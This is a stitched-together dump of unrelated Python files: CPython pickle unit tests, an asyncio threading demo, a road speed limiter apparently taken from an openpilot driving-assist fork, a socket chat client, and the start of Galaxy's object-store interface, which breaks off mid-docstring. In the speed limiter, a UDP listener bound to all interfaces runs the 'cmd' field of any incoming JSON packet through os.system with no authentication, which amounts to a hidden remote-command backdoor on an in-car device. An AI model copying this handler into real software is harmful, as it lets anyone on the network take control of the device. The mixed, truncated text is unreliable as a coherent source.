return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
support.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such callable may be created by other persons than the ones who created the
BBB class. If passed as the state_setter item of a custom reducer, this
allows for custom state setting behavior of BBB objects. One can think of
it as the analogous of list_setitems or dict_setitems but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overriden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicity invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
8 coroutine async_&_await.py
|
import time
import asyncio
from queue import Queue
from threading import Thread
def start_loop(loop):
# 一个在后台永远运行的事件循环
asyncio.set_event_loop(loop)
loop.run_forever()
async def do_sleep(x, queue, msg=""):
await asyncio.sleep(x)
queue.put(msg)
queue = Queue()
new_loop = asyncio.new_event_loop()
# 定义一个线程,并传入一个事件循环对象
t = Thread(target=start_loop, args=(new_loop,))
t.start()
print(time.ctime())
# 动态添加两个协程
# 这种方法,在主线程是异步的
asyncio.run_coroutine_threadsafe(do_sleep(6, queue, "第一个"), new_loop)
asyncio.run_coroutine_threadsafe(do_sleep(3, queue, "第二个"), new_loop)
while True:
msg = queue.get()
print("{} 协程运行完..".format(msg))
print(time.ctime())
# =================================================
# # sync
#
# def start_loop(loop):
# # 一个在后台永远运行的事件循环
# asyncio.set_event_loop(loop)
# loop.run_forever()
#
#
# def do_sleep(x, queue, msg=""):
# time.sleep(x)
# queue.put(msg)
#
#
# queue = Queue()
#
# new_loop = asyncio.new_event_loop()
#
# # 定义一个线程,并传入一个事件循环对象
# t = Thread(target=start_loop, args=(new_loop,))
# t.start()
#
# print(time.ctime())
#
# # 动态添加两个协程
# # 这种方法,在主线程是同步的
# new_loop.call_soon_threadsafe(do_sleep, 6, queue, "第一个")
# new_loop.call_soon_threadsafe(do_sleep, 3, queue, "第二个")
#
# while True:
# msg = queue.get()
# print("{} 协程运行完..".format(msg))
# print(time.ctime())
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.numpy_fast import clip
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
gps = Thread(target=self.gps_thread, args=[])
gps.setDaemon(True)
gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps({"location": [
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
]})
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def send_sdp(self, sock):
try:
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
ret = False
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
ret = False
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.send_sdp(sock)
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 20
MAX_LIMIT = 100
else:
MIN_LIMIT = 20
MAX_LIMIT = 120
if cam_type == 22: # speed bump
MIN_LIMIT = 10
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
if cam_type == 22:
safe_dist = v_ego * 3.
else:
safe_dist = v_ego * 6.
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
first_started = True
else:
first_started = False
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
if __name__ == "__main__":
main()
|
ClientConnection.py
|
import socket
import getpass
from threading import Thread
"""This module taces care of the server-specific logic."""
class ClientConnection:
"""Base class which takes care of initializing the client \
for either chat or transfer."""
def __init__(self, server_ip, client_ip, callbacks):
self.server_ip = server_ip
self.client_ip = client_ip
def start(self):
self.clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.clientsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.clientsocket.connect((self.server_ip, 8087))
self.read_from_server()
class ChatClient(ClientConnection):
"""Takes care of initializing the client for chat."""
def __init__(self, server_ip, client_ip, callbacks):
ClientConnection.__init__(self, server_ip, client_ip, callbacks)
self.ready_for_chat, self.on_send, self.on_receive = callbacks
def read_from_server(self):
self.thread = Thread(target=self.printer)
self.thread.daemon = True
self.thread.start()
self.ready_for_chat(self.send_message)
def send_message(self, message):
self.clientsocket.send(message.encode())
self.on_send(message)
def printer(self):
while True:
buf = self.clientsocket.recv(128)
if len(buf) > 0:
user = getpass.getuser()
message = buf.decode()
self.on_receive(user, self.client_ip, message)
class TransferClient(ClientConnection):
"""Takes care of initializing the server endpoint for transfer."""
def __init__(self, server_ip, client_ip, callbacks):
ClientConnection.__init__(self, server_ip, client_ip, callbacks)
self.transfer_send, self.transfer_receive = callbacks
def read_from_server(self):
while True:
buf = self.clientsocket.recv(128)
if len(buf) > 0:
self.transfer_receive(buf)
else:
break
self.clientsocket.close()
|
__init__.py
|
"""
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import abc
import logging
import os
import random
import shutil
import threading
import time
from collections import OrderedDict
import yaml
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
force_symlink,
parse_xml,
umask_fix_perms,
)
from galaxy.util.bunch import Bunch
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = "Attempted to 'create' object store entity in configuration with no database session present."
log = logging.getLogger(__name__)
class ObjectStore(metaclass=abc.ABCMeta):
"""ObjectStore interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
@abc.abstractmethod
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
@abc.abstractmethod
def create(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
@abc.abstractmethod
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Test if the object identified by `obj` has content.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
@abc.abstractmethod
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
@abc.abstractmethod
def delete(self, obj, entire_dir=False, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_data(self, obj, start=0, count=-1, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
@abc.abstractmethod
def get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
@abc.abstractmethod
def update_from_file(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, file_name=None, create=False):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct acces if supported, otherwise return None.
